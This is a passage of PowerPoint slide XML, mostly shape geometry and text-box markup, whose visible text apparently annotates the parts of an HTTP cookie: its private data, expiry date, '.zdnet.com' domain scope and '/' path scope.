        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145420" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EFCEF3-B87D-DA40-B905-AD8E9333EFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1714500" y="5397500"/>
            <a:ext cx="8302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90500" indent="-1778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000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Private)  Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145421" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17D1EF7-1EE9-E640-8495-31D0F37C2904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2127250" y="4849813"/>
            <a:ext cx="0" cy="246062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 h 245110"/>
              <a:gd name="T1" fmla="*/ 267700 h 245110"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="0" y="T0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="0" y="T1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path h="245110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="244865"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="2946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22" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29EC5282-E572-1A44-BF20-ED5020EA4D75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2063750" y="4735513"/>
            <a:ext cx="130175" cy="130175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 64833 w 130175"/>
              <a:gd name="T1" fmla="*/ 0 h 130175"/>
              <a:gd name="T2" fmla="*/ 0 w 130175"/>
              <a:gd name="T3" fmla="*/ 129654 h 130175"/>
              <a:gd name="T4" fmla="*/ 129654 w 130175"/>
              <a:gd name="T5" fmla="*/ 129654 h 130175"/>
              <a:gd name="T6" fmla="*/ 64833 w 130175"/>
              <a:gd name="T7" fmla="*/ 0 h 1301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175" h="130175">
                <a:moveTo>
                  <a:pt x="64833" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129654" y="129654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648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45423" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E97F7D7-0A93-694A-A3B8-89959F3F8C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2063750" y="5080000"/>
            <a:ext cx="130175" cy="130175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 129654 w 130175"/>
              <a:gd name="T1" fmla="*/ 0 h 130175"/>
              <a:gd name="T2" fmla="*/ 0 w 130175"/>
              <a:gd name="T3" fmla="*/ 0 h 130175"/>
              <a:gd name="T4" fmla="*/ 64833 w 130175"/>
              <a:gd name="T5" fmla="*/ 129654 h 130175"/>
              <a:gd name="T6" fmla="*/ 129654 w 130175"/>
              <a:gd name="T7" fmla="*/ 0 h 1301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175" h="130175">
                <a:moveTo>
                  <a:pt x="129654" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64833" y="129654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296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45424" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F8F4B2-43DC-3542-9D83-5914D4304593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3816350" y="4076700"/>
            <a:ext cx="1588" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2539"/>
              <a:gd name="T1" fmla="*/ 1 w 2539"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="T1" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2417"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25" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08FADEAB-4963-9A47-933A-213DD36C1F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3052763" y="4076700"/>
            <a:ext cx="704850" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 704850"/>
              <a:gd name="T1" fmla="*/ 704627 w 704850"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="T1" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="704850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="704627"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26" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{481F2B08-2BFB-FD42-8897-685D936E8461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2846388" y="3959225"/>
            <a:ext cx="236537" cy="236538"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 243145 w 236219"/>
              <a:gd name="T1" fmla="*/ 0 h 236220"/>
              <a:gd name="T2" fmla="*/ 0 w 236219"/>
              <a:gd name="T3" fmla="*/ 121572 h 236220"/>
              <a:gd name="T4" fmla="*/ 243145 w 236219"/>
              <a:gd name="T5" fmla="*/ 243145 h 236220"/>
              <a:gd name="T6" fmla="*/ 243145 w 236219"/>
              <a:gd name="T7" fmla="*/ 0 h 236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219" h="236220">
                <a:moveTo>
                  <a:pt x="235737" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="117868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235737" y="235737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2357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45427" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABBCC3A5-57B6-8549-8304-6E8F0DFD5F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3786188" y="3006725"/>
            <a:ext cx="0" cy="1106488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1127166 h 1105535"/>
              <a:gd name="T1" fmla="*/ 0 h 1105535"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="0" y="T0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="0" y="T1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1105535">
                <a:moveTo>
                  <a:pt x="0" y="1105048"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="5893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object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C459F1A-D973-4C47-ACC7-E66A73D553E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4333875" y="3279775"/>
            <a:ext cx="119063" cy="239713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="220" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C67DFCD-E41D-494D-9A10-64A2639A98C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4333875" y="3862388"/>
            <a:ext cx="119063" cy="239712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="220" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01983696-9DB3-A745-82F1-0FBF41FB0326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4559300" y="3816350"/>
            <a:ext cx="4905375" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>value was no </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>good </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Feb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>18…</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC51A3EE-83B3-ED42-A93D-DE51EE4397E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4333875" y="4446588"/>
            <a:ext cx="119063" cy="239712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="220" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145432" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3923AFC2-F96C-5E44-948C-1BA28D8D9AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4559300" y="4414838"/>
            <a:ext cx="46990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300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This value should only be readable by  any domain ending in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.zdnet.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CAB7E28-FF4B-5345-88CC-77F21AFE89AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4333875" y="5327650"/>
            <a:ext cx="119063" cy="233363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="220" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145434" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{111E5CE6-CFC9-A346-A6D5-57E119C7BE73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4559300" y="5303838"/>
            <a:ext cx="4487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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This should be available to any resource  within a subdirectory of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3340375-CD26-0048-B51C-57827B16F747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4333875" y="6210300"/>
            <a:ext cx="119063" cy="239713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="220" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12FC5578-A0DF-5345-A31D-C52BF9446D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4559300" y="6165850"/>
            <a:ext cx="4791075" cy="919163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2320"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with any </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>future </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2320"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;domain&gt;/&lt;path&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145437" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B22DFA-7747-E547-9DEF-DC6AA63FB75A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2068513" y="2003425"/>
            <a:ext cx="1039812" cy="198438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1039494"/>
              <a:gd name="T1" fmla="*/ 124690 h 198755"/>
              <a:gd name="T2" fmla="*/ 0 w 1039494"/>
              <a:gd name="T3" fmla="*/ 66470 h 198755"/>
              <a:gd name="T4" fmla="*/ 5464 w 1039494"/>
              <a:gd name="T5" fmla="*/ 40597 h 198755"/>
              <a:gd name="T6" fmla="*/ 20334 w 1039494"/>
              <a:gd name="T7" fmla="*/ 19469 h 198755"/>
              <a:gd name="T8" fmla="*/ 42414 w 1039494"/>
              <a:gd name="T9" fmla="*/ 5224 h 198755"/>
              <a:gd name="T10" fmla="*/ 69439 w 1039494"/>
              <a:gd name="T11" fmla="*/ 0 h 198755"/>
              <a:gd name="T12" fmla="*/ 976921 w 1039494"/>
              <a:gd name="T13" fmla="*/ 0 h 198755"/>
